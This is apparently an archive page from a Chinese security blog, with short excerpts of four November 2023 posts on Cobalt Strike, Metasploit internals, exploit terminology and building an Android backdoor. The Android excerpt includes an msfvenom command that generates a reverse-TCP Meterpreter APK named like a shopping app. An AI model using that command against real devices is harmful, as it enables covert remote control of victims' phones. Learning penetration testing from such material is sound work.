11 2023 档案

摘要:CS简介 Cobalt Strike(简称CS)是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动,分为服务器和客户端。 模式: Cobalt Strike使用C/S架构(client/server),Cobalt Strike的客户端连接到团队服务器,团队 阅读全文
posted @ 2023-11-30 15:57 虾仁芝士炒饭 阅读(452) 评论(0) 推荐(0) 编辑
摘要:PoC: 全称“Proof of Concept”,中文“概念验证”,常指 段漏洞证明的代码。 Exp: 全称“Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作作。 Payload: 中文“有效载荷”,指成功 exploit 之后,真正在目标系统执行的代码或指令 RCE: RCE(rem 阅读全文
posted @ 2023-11-07 14:44 虾仁芝士炒饭 阅读(1043) 评论(0) 推荐(0) 编辑
摘要:1、首先通过MSF,生成手机client端程序,其中需要配置server端IP和port; msfvenom主要用来生成带后门的软件 msfvenom -p android/meterpreter/reverse_tcp lhost=172.20.10.4 lport=1250 > jd.apk 2 阅读全文
posted @ 2023-11-06 17:28 虾仁芝士炒饭 阅读(423) 评论(0) 推荐(0) 编辑
摘要:一、Metasploit 渗透测试框架介绍 (1)基础库 metasploit基础库文件位于源码根目录路径下的libraries目录中,包括Rex,framework-core和framework-base三部分。 Rex是整个框架所依赖的最基础的一些组件,如包装的网络套接字、网络应用协议客户端与服 阅读全文
posted @ 2023-11-06 15:29 虾仁芝士炒饭 阅读(139) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示